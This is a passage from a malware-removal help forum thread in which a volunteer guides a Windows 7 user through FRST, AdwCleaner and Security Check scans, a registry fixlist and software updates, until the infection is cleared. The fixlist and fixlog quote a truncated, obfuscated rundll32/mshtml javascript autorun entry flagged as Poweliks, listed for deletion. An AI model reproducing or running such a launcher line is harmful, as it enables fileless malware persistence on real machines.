2014-10-18 09:31 - 2013-04-17 19:04 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 09:31 - 2013-04-17 19:04 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 17:18 - 2013-10-26 14:04 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-16 17:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 10:36 - 2014-03-30 10:14 - 00002021 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-10-16 10:36 - 2012-09-26 13:37 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-10-16 10:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-16 10:25 - 2013-12-27 16:00 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-16 10:24 - 2013-12-27 16:00 - 00003228 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-16 10:24 - 2013-12-27 16:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2014-10-16 10:24 - 2009-07-13 23:45 - 03009656 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 10:20 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-16 10:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 10:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 10:17 - 2013-12-09 20:09 - 00016803 _____ () C:\Windows\IE11_main.log
2014-10-16 10:17 - 2012-09-30 16:37 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-16 10:10 - 2013-08-20 17:30 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 10:07 - 2012-09-30 14:37 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-08 13:20 - 2014-04-12 09:31 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Paul Pratt

Some content of TEMP:
====================
C:\Users\JoseAlcazar\AppData\Local\Temp\ose00000.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-26 16:43

==================== End Of Log ============================



#4 jmantowin

jmantowin
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 05 November 2014 - 10:45 AM

Here is the attachment.

Attached Files



#5 nasdaq

nasdaq

  • Malware Response Team
  • 38,257 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:09 AM

Posted 05 November 2014 - 11:40 AM

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
start

HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
CHR DefaultSearchKeyword: Default -> conduit.search
CHR DefaultSearchURL: Default -> http://search.conduit.com/Results.aspx?ctid=CT3320691&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SPC9E6EF2F-5A94-4006-916C-319ED897D608&q={searchTerms}&SSPV=
CHR DefaultSuggestURL: Default -> http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]

End
Save the files as fixlist.txt into the same folder as FRST

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log Fixlog.txt please post it to your reply.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

Here]]http://screen317.spywareinfoforum.org/SecurityCheck.exe].
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called [b]checkup.txt; please post the contents of that document.
p.s.
If the SecurityCheck program fails to run for any reason, run it as an Administrator.

If the site is busy or not available use this mirror site:
http://www.bleepingcomputer.com/download/securitycheck/

How is the computer running now?

Edited by nasdaq, 05 November 2014 - 02:00 PM.


#6 jmantowin

jmantowin
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 05 November 2014 - 12:15 PM

Things look good...everything appears to be working normally now. The warnings from Norton and Malwarebytes seem to have stopped. I don't see any propagation of COMSurrogate either.

Anything else I should do?

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-11-2014
Ran by JoseAlcazar at 2014-11-05 11:53:51 Run:1
Running from C:\Users\JoseAlcazar\Videos\virus\Bleepinghelp
Loaded Profile: JoseAlcazar (Available profiles: JoseAlcazar & Guest)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start

HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
CHR DefaultSearchKeyword: Default -> conduit.search
CHR DefaultSearchURL: Default -> http://search.conduit.com/Results.aspx?ctid=CT3320691&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SPC9E6EF2F-5A94-4006-916C-319ED897D608&q={searchTerms}&SSPV=
CHR DefaultSuggestURL: Default -> http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]

End
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3020843540-2314379756-2588281441-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
"HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value deleted successfully.
"HKCR\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
Chrome DefaultSearchKeyword deleted successfully.
Chrome DefaultSearchURL deleted successfully.
Chrome DefaultSuggestURL deleted successfully.
AntiLog32 => Service deleted successfully.

==== End of Fixlog ====

 

# AdwCleaner v3.311 - Report created 05/11/2014 at 12:06:13
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : JoseAlcazar - JOSEALCAZAR-PC
# Running from : C:\Users\JoseAlcazar\Videos\virus\Bleepinghelp\adwcleaner_3.311.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344

-\\ Google Chrome v38.0.2125.111

[ File : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\preferences ]

[ File : C:\Users\JoseAlcazar\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [4488 octets] - [30/10/2014 15:26:11]
AdwCleaner[R1].txt - [1055 octets] - [05/11/2014 12:00:01]
AdwCleaner[R2].txt - [1116 octets] - [05/11/2014 12:05:48]
AdwCleaner[S0].txt - [4319 octets] - [30/10/2014 15:28:50]
AdwCleaner[S1].txt - [1038 octets] - [05/11/2014 12:06:13]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1098 octets] ##########



#7 nasdaq

nasdaq

  • Malware Response Team
  • 38,257 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:09 AM

Posted 05 November 2014 - 02:02 PM

One last scan.

Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
p.s.
If the SecurityCheck program fails to run for any reason, run it as an Administrator.

If the site is busy or not available use this mirror site:
http://www.bleepingcomputer.com/download/securitycheck/

How is the computer running now?

#8 jmantowin

jmantowin
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 05 November 2014 - 02:33 PM

Everything continues to operate normally. 

 

 

Results of screen317's Security Check version 0.99.89 
 Windows 7 Service Pack 1 x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled! 
Norton Security Suite  
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 Java 7 Update 71 
 Java version out of Date!
 Adobe Flash Player 10 Flash Player out of Date!
 Adobe Reader 10.1.12 Adobe Reader out of Date! 
 Google Chrome 38.0.2125.104 
 Google Chrome 38.0.2125.111 
````````Process Check: objlist.exe by Laurent```````` 
 Malwarebytes Anti-Malware mbamservice.exe 
 Malwarebytes Anti-Malware mbam.exe 
 JoseAlcazar Videos virus Bleepinghelp\SecurityCheck.exe
 Malwarebytes Anti-Malware mbamscheduler.exe  
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 1%
````````````````````End of Log``````````````````````
 



#9 nasdaq

nasdaq

  • Malware Response Team
  • 38,257 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:09 AM

Posted 06 November 2014 - 08:15 AM

You have the latest version of Java.

Get the latest version of the Adobe Reader.
http://get.adobe.com/reader/
Before your download I suggest you unckeck the box on the top right "Yes, install McAfee Security Scan Plus - optional" this is not required if you are not a McAfee subscriber. While the installation is in progress you can also deny the installation of any other programs that may be suggested.

When installed remove your old version of the Reader using the Add/Remove Programs applet if present.
<<<>>>

Critical vulnerabilities have been identified in old version of Adobe Flash Player please get the latest version.

Flash test site:
http://www.adobe.com/software/flash/about/
Install the new version or if you have the latest close the windows.

Flash Player Help / Find version
http://helpx.adobe.com/flash-player/kb/find-version-flash-player.html#main_Find_the_Flash_Player_version_installed_on_your_machine
===

If all is well.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/
===

#10 jmantowin

jmantowin
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:09 AM

Posted 06 November 2014 - 06:08 PM

Done.

 

I can't thank you enough. Glad there are people out there to help out with these kinds of things.

 

Jman



#11 nasdaq

nasdaq

  • Malware Response Team
  • 38,257 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:09 AM

Posted 07 November 2014 - 07:58 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users